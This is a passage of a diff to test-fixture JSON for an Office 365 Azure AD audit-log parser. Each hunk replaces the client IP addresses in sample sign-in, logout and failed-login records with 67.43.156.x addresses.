Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2207,10 +2207,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:19", "ExtendedProperties": [ { @@ -2253,7 +2253,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2271,10 +2271,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:40", "ExtendedProperties": [ { @@ -2324,7 +2324,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2334,10 +2334,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:30:58", "ExtendedProperties": [ { @@ -2380,7 +2380,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2398,10 +2398,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:31:33", "ExtendedProperties": [ { @@ -2452,7 +2452,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2462,10 +2462,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:14:25", "ExtendedProperties": [ { @@ -2508,7 +2508,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2526,10 +2526,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:14:51", "ExtendedProperties": [ { @@ -2580,7 +2580,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2598,10 +2598,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:29:56", "ExtendedProperties": [ { @@ -2651,7 +2651,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 